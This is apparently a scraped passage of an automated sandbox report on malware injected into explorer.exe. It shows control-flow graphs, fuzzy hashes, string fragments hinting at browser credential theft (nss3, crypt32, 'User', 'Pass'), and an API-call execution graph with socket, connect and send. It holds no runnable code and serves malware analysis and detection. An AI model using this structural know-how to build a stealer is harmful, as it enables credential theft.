                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 228 598b082-598b0b8 229 598b0ba-598b0dc call 598deb2 228->229 230 598b0e2-598b105 connect 228->230 229->230
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: connect
                                                                                                                                                                                                                                                                                                • String ID: conn$ect
                                                                                                                                                                                                                                                                                                • API String ID: 1959786783-716201944
                                                                                                                                                                                                                                                                                                • Opcode ID: 8e6ee82cb52f8b496bef60ee2b46d6d5c6c48f9218987fc6b92af486adba5c92
                                                                                                                                                                                                                                                                                                • Instruction ID: 7bfeeb06af93a23cb41ad687d6e585a19d20095190e76456b02f0ee85a8b85ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e6ee82cb52f8b496bef60ee2b46d6d5c6c48f9218987fc6b92af486adba5c92
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7014470518A0C8FCB84EF5CE088B547BE1FB58311F1541BEDA0DDB266C7B4D9818B85
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 233 598af66-598af7b 234 598af8d-598afab 233->234 235 598af7d-598af8b 233->235 236 598afad-598afcf call 598deb2 234->236 237 598afd5-598aff0 WSAStartup 234->237 235->234 236->237
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Startup
                                                                                                                                                                                                                                                                                                • String ID: WSAS$tart
                                                                                                                                                                                                                                                                                                • API String ID: 724789610-2426239465
                                                                                                                                                                                                                                                                                                • Opcode ID: 02406650e447c1fa7574cd5d84556fafe90163be47b457b1ed939eb2c599c675
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b64504789f72e25c56f6e8a7c555e305f945fd2d4cbac24f5de2a9597b3a9b6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02406650e447c1fa7574cd5d84556fafe90163be47b457b1ed939eb2c599c675
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9101B1B10196048FCB41FF28D08CBA9BBE0FF58365F2441E9E50ADF265D3B489898756
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 240 598af72-598afab 242 598afad-598afcf call 598deb2 240->242 243 598afd5-598aff0 WSAStartup 240->243 242->243
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Startup
                                                                                                                                                                                                                                                                                                • String ID: WSAS$tart
                                                                                                                                                                                                                                                                                                • API String ID: 724789610-2426239465
                                                                                                                                                                                                                                                                                                • Opcode ID: 1d4e0883fc1815f1912b8eb6048150167a70f4de8bbb156eb55e64cb1498d31e
                                                                                                                                                                                                                                                                                                • Instruction ID: 7973e9ceb970e7cad1d614d21efa2db51d9fa481265cad411378a454ba248611
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d4e0883fc1815f1912b8eb6048150167a70f4de8bbb156eb55e64cb1498d31e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0018F71508A088FCB40EF1CD08CB69BBE0FB58352F2581E9E50DDB265C3B48A858796
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                control_flow_graph 246 5986592-59865d6 call 5986012 call 598deb2 251 5986678-598668c 246->251 252 59865dc-59865de 246->252 253 59865e2-59865f3 SleepEx 252->253 253->253 254 59865f5-5986607 253->254 255 5986609-598660f 254->255 256 598663d-5986643 254->256 255->256 257 5986611-5986626 call 5987002 255->257 256->253 258 5986645-598664b 256->258 257->256 263 5986628-5986638 call 5986a42 257->263 258->253 260 598664d-5986653 258->260 260->253 262 5986655-5986666 call 5987e22 call 598d4b2 260->262 268 598666b-5986673 call 59863f2 262->268 263->256 268->253
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                • String ID: K;y&
                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-1772047635
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 271 598aff2-598b025 272 598b04f-598b077 send 271->272 273 598b027-598b049 call 598deb2 271->273 273->272
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
Similarity
• API ID: send
• String ID: send
• API String ID: 2809346765-2809346765
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 276 598aed9-598af1a 277 598af1c-598af3e call 598deb2 276->277 278 598af44-598af65 socket 276->278 277->278
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
Similarity
• API ID: socket
• String ID: sock
• API String ID: 98920635-2415254727
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 281 598aee2-598af1a 282 598af1c-598af3e call 598deb2 281->282 283 598af44-598af65 socket 281->283 282->283
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
Similarity
• API ID: socket
• String ID: sock
• API String ID: 98920635-2415254727
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 286 598d4b2-598d4e6 287 598d4e9-598d4ed 286->287 288 598d569-598d572 287->288 289 598d4ef-598d4f2 287->289 288->287 290 598d578-598d581 288->290 289->288 291 598d4f4-598d55f call 598f342 call 598f312 call 598e4f2 289->291 292 598d5ba-598d5d6 290->292 293 598d583-598d58a 290->293 291->288 305 598d561-598d567 SleepEx 291->305 295 598d58c-598d58d 293->295 296 598d59f-598d5a8 293->296 299 598d593-598d59d 295->299 296->292 300 598d5aa-598d5b1 296->300 299->296 299->299 300->292 302 598d5b3-598d5b4 300->302 302->292 305->288
APIs
Memory Dump Source
• Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 306 598d4ab-598d4ac 307 598d50d-598d514 306->307 308 598d4ae-598d4b1 306->308 309 598d51f-598d55f call 598e4f2 307->309 310 598d51a call 598f312 307->310 308->307 313 598d569-598d572 309->313 314 598d561-598d567 SleepEx 309->314 310->309 315 598d578-598d581 313->315 316 598d4e9-598d4ed 313->316 314->313 317 598d5ba-598d5d6 315->317 318 598d583-598d58a 315->318 316->313 319 598d4ef-598d4f2 316->319 320 598d58c-598d58d 318->320 321 598d59f-598d5a8 318->321 319->313 322 598d4f4-598d51a call 598f342 call 598f312 319->322 323 598d593-598d59d 320->323 321->317 324 598d5aa-598d5b1 321->324 322->309 323->321 323->323 324->317 326 598d5b3-598d5b4 324->326 326->317
APIs
Memory Dump Source
• Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: .dll$32.d$K;y&$M$S$el32$kern$ll$user
                                                                                                                                                                                                                                                                                                • API String ID: 0-2102913938
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                                                                                                                                • API String ID: 0-3558027158
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                                                                                                                • API String ID: 0-2058692283
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: U$b$d$k$n$o
                                                                                                                                                                                                                                                                                                • API String ID: 0-1739295752
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: .dll$cryp$dll$nss3$t32.
                                                                                                                                                                                                                                                                                                • API String ID: 0-1478216402
                                                                                                                                                                                                                                                                                                • Opcode ID: ed6325d0aff5055827ada73a612b01221855a1ddf8e9fb96a19483f3db3cb0e3
                                                                                                                                                                                                                                                                                                • Instruction ID: e49f79fa2d57532eda4462cb7bacf6c2db42e1f56ba9b6f94f04343a363d1d25
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed6325d0aff5055827ada73a612b01221855a1ddf8e9fb96a19483f3db3cb0e3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39616D30A18B1E8FDB99EF68C4487DAB3E1FF18318F40862E981AC7295DB74D554CB85
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: .dll$cryp$dll$nss3$t32.
                                                                                                                                                                                                                                                                                                • API String ID: 0-1478216402
                                                                                                                                                                                                                                                                                                • Opcode ID: a6cf1db3b2cf44addb77c6c3145e795bac18999a885706ce33a387fa702dbb64
                                                                                                                                                                                                                                                                                                • Instruction ID: c170e3aac653ba33a5ee363047f999956e47eb101bb7892f113654eaf689d7e9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6cf1db3b2cf44addb77c6c3145e795bac18999a885706ce33a387fa702dbb64
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED616C30A18B1E8FDB99EF68C4487DAB3E1FF18318F40862E981AC7295DB749554CB85
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                                                                                                                                • API String ID: 0-1970020201
                                                                                                                                                                                                                                                                                                • Opcode ID: 7312c44d1f0932142c55cb86490c7abd72f0b28439fd4d223315acbb67dd2d0a
                                                                                                                                                                                                                                                                                                • Instruction ID: 1944f53e23f0ef18592c4aaa632ce1590d37f42571718afd2c7920589bd5e7a3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7312c44d1f0932142c55cb86490c7abd72f0b28439fd4d223315acbb67dd2d0a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39615D70914B4D8BCB94EFA4C4446DEB7F1FF58301F404A2EA89BE7254EF3095519B8A
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                                                                                                                                • API String ID: 0-1970020201
                                                                                                                                                                                                                                                                                                • Opcode ID: 5a3df0026cc56c1644cef290c070b6d3b80a5a80f5bc76ad6d38711de2aa5d2b
                                                                                                                                                                                                                                                                                                • Instruction ID: 5e1fdfe0f3fc86a9279256f8eacfd787a9d2461c228ab1897b29878c9e8717c2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a3df0026cc56c1644cef290c070b6d3b80a5a80f5bc76ad6d38711de2aa5d2b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5615D70914B4D8BDB94EFA4C4446DEB7F1FF58301F404A2EA89BD7254EF3095419B8A
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: -Age$User$nt: $on.d$urlm
                                                                                                                                                                                                                                                                                                • API String ID: 0-1987325725
                                                                                                                                                                                                                                                                                                • Opcode ID: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                                                                                                                                                                                                                                                • Instruction ID: 6f30a3264b529d4a6eecb7897b14d19d91f94938949d637f0f249fa8741d7470
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9231D130A24A4D8BCB84EFA8D8842EEB7E1FF58215F40422ED45ED7240DE7486448B95
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: .dll$el32$h$kern
                                                                                                                                                                                                                                                                                                • API String ID: 0-4264704552
                                                                                                                                                                                                                                                                                                • Opcode ID: fe29a7bb7e7f92cd852e6a8374585ad37a329447348795b15412dffb0aea7bb3
                                                                                                                                                                                                                                                                                                • Instruction ID: da4d4cf171f8ddceaa5385b29332dbdd0afc0fc180b34462ab9e74ff697f63cb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe29a7bb7e7f92cd852e6a8374585ad37a329447348795b15412dffb0aea7bb3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F415F70A18B498FDBE8DF29C8843EAB7E1FB98301F145A2E949AC3255DB70C545CB81
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:9.9%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:3.9%
                                                                                                                                                                                                                                                                                                Signature Coverage:2%
                                                                                                                                                                                                                                                                                                Total number of Nodes:791
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:100
4f9238 23932->23933 23934 507370 7 API calls 23933->23934 23935 4f9249 23934->23935 23936 507370 7 API calls 23935->23936 23938 4f9266 23935->23938 23936->23938 23937 507370 7 API calls 23939 4f9284 23937->23939 23938->23937 23942 4f92b5 23938->23942 23939->23942 24108 4fd360 NtClose LdrInitializeThunk LdrInitializeThunk 23939->24108 23942->23920 24095 4f8d80 23942->24095 23945 4fa053 23943->23945 23944 4fa066 23944->23916 23945->23944 23958 50d750 23945->23958 23947 4fa0a3 23947->23944 23969 4f9e80 23947->23969 23949 4fa0c3 23949->23916 23952 4fe0a9 23950->23952 23951 4fa115 23951->23910 23952->23951 24071 50cbd0 23952->24071 23954 4fe0e2 23955 4fe10d 23954->23955 24074 50c660 23954->24074 23957 50c890 NtClose 23955->23957 23957->23951 23959 50d769 23958->23959 23960 507370 7 API calls 23959->23960 23961 50d781 23960->23961 23962 50d78a 23961->23962 23975 50d590 23961->23975 23962->23947 23964 50d79e 23964->23962 23988 50c300 23964->23988 23966 50e300 RtlFreeHeap 23968 50d7fc 23966->23968 23967 50d7d2 23967->23966 23968->23947 24050 4f7670 23969->24050 23971 4f9ea1 23971->23949 23972 4f9e9a 23972->23971 24063 4f7930 23972->24063 23976 50d5ab 23975->23976 23977 50d5bd 23976->23977 23978 50e280 NtAllocateVirtualMemory 23976->23978 23977->23964 23979 50d5dd 23978->23979 23992 506970 23979->23992 23981 50d600 23981->23977 23982 506970 2 API calls 23981->23982 23984 50d622 23982->23984 23984->23977 24017 507cd0 23984->24017 23985 50d6aa 24028 50c2c0 23985->24028 23987 50d712 23987->23964 23989 50c31c 23988->23989 24047 109967a 23989->24047 23990 50c337 23990->23967 23993 506981 23992->23993 23994 506989 23992->23994 23993->23981 24016 506c5c 23994->24016 24032 50f480 23994->24032 23996 5069dd 23997 50f480 RtlAllocateHeap 23996->23997 24000 5069e8 23997->24000 23998 506a36 24001 50f480 RtlAllocateHeap 23998->24001 24000->23998 24037 50f520 24000->24037 24002 506a4a 24001->24002 24003 50f480 RtlAllocateHeap 24002->24003 24005 506abd 24003->24005 24004 50f480 
RtlAllocateHeap 24010 506b05 24004->24010 24005->24004 24008 50f4e0 RtlFreeHeap 24009 506c3e 24008->24009 24011 50f4e0 RtlFreeHeap 24009->24011 24043 50f4e0 24010->24043 24012 506c48 24011->24012 24013 50f4e0 RtlFreeHeap 24012->24013 24014 506c52 24013->24014 24015 50f4e0 RtlFreeHeap 24014->24015 24015->24016 24016->23981 24018 507ce1 24017->24018 24019 507370 7 API calls 24018->24019 24023 507cf7 24019->24023 24020 507d00 24020->23985 24021 507d37 24022 50e300 RtlFreeHeap 24021->24022 24024 507d48 24022->24024 24023->24020 24023->24021 24025 507d83 24023->24025 24024->23985 24026 50e300 RtlFreeHeap 24025->24026 24027 507d88 24026->24027 24027->23985 24029 50c2dc 24028->24029 24046 1099860 LdrInitializeThunk 24029->24046 24030 50c2f3 24030->23987 24033 50f490 24032->24033 24034 50f496 24032->24034 24033->23996 24035 50e3e0 RtlAllocateHeap 24034->24035 24036 50f4bc 24035->24036 24036->23996 24038 50f545 24037->24038 24039 50f57d 24037->24039 24040 50e3e0 RtlAllocateHeap 24038->24040 24039->24000 24041 50f55a 24040->24041 24042 50e300 RtlFreeHeap 24041->24042 24042->24039 24044 506c34 24043->24044 24045 50e300 RtlFreeHeap 24043->24045 24044->24008 24045->24044 24046->24030 24048 109968f LdrInitializeThunk 24047->24048 24049 1099681 24047->24049 24048->23990 24049->23990 24051 4f767b 24050->24051 24052 4f7680 24050->24052 24051->23972 24053 50e280 NtAllocateVirtualMemory 24052->24053 24054 4f76a5 24053->24054 24055 4f7708 24054->24055 24056 50c2c0 LdrInitializeThunk 24054->24056 24057 4f770e 24054->24057 24062 50e280 NtAllocateVirtualMemory 24054->24062 24066 50c9c0 24054->24066 24055->23972 24056->24054 24058 4f7734 24057->24058 24060 50c9c0 LdrInitializeThunk 24057->24060 24058->23972 24061 4f7725 24060->24061 24061->23972 24062->24054 24064 50c9c0 LdrInitializeThunk 24063->24064 24065 4f794e 24064->24065 24065->23949 24067 50c9dc 24066->24067 24070 10996e0 LdrInitializeThunk 24067->24070 24068 50c9f3 24068->24054 24070->24068 24072 50d3d0 24071->24072 24073 50cbef 
LookupPrivilegeValueW 24072->24073 24073->23954 24075 50c67c 24074->24075 24078 1099910 LdrInitializeThunk 24075->24078 24076 50c69b 24076->23955 24078->24076 24080 4fe2fc 24079->24080 24109 4fe1a0 24080->24109 24083 4fe329 24085 4fe334 24083->24085 24087 50c890 NtClose 24083->24087 24084 4fe341 24086 4fe352 24084->24086 24088 50c890 NtClose 24084->24088 24085->23922 24086->23922 24087->24085 24088->24086 24090 4fc886 24089->24090 24092 4fc890 24089->24092 24090->23931 24091 4fc938 24091->23931 24092->24091 24093 507370 7 API calls 24092->24093 24094 4fc9a9 24093->24094 24094->23931 24097 4f8d9a 24095->24097 24120 4fe590 24095->24120 24104 4f90f1 24097->24104 24124 506ca0 24097->24124 24099 4f8df6 24100 50f480 RtlAllocateHeap 24099->24100 24099->24104 24106 4f8f95 24100->24106 24101 4f7670 3 API calls 24101->24106 24104->23920 24106->24101 24106->24104 24107 4f7930 LdrInitializeThunk 24106->24107 24127 4fc5c0 24106->24127 24165 4fe530 24106->24165 24169 4fdf90 24106->24169 24107->24106 24108->23942 24110 4fe1ba 24109->24110 24114 4fe270 24109->24114 24115 50c380 24110->24115 24113 50c890 NtClose 24113->24114 24114->24083 24114->24084 24116 50c39c 24115->24116 24119 1099fe0 LdrInitializeThunk 24116->24119 24117 4fe264 24117->24113 24119->24117 24121 4fe59d 24120->24121 24122 4fe5bc SetErrorMode 24121->24122 24123 4fe5c3 24121->24123 24122->24123 24123->24097 24179 4fe360 24124->24179 24126 506cc6 24126->24099 24128 4fc5d9 24127->24128 24129 4fc5df 24127->24129 24196 4fdc80 24128->24196 24203 4f9bd0 24129->24203 24132 4fc5ec 24133 4fe530 LdrInitializeThunk 24132->24133 24134 4fc61c 24132->24134 24164 4fc865 24132->24164 24133->24134 24135 4fc743 24134->24135 24136 50c300 LdrInitializeThunk 24134->24136 24134->24164 24213 4fc560 LdrInitializeThunk 24135->24213 24137 4fc69a 24136->24137 24137->24135 24138 4fc6a6 24137->24138 24142 4fc6ef 24138->24142 24145 50c410 LdrInitializeThunk 24138->24145 24138->24164 24140 4fc762 24141 4fc76a 24140->24141 24214 4fc4e0 NtClose 
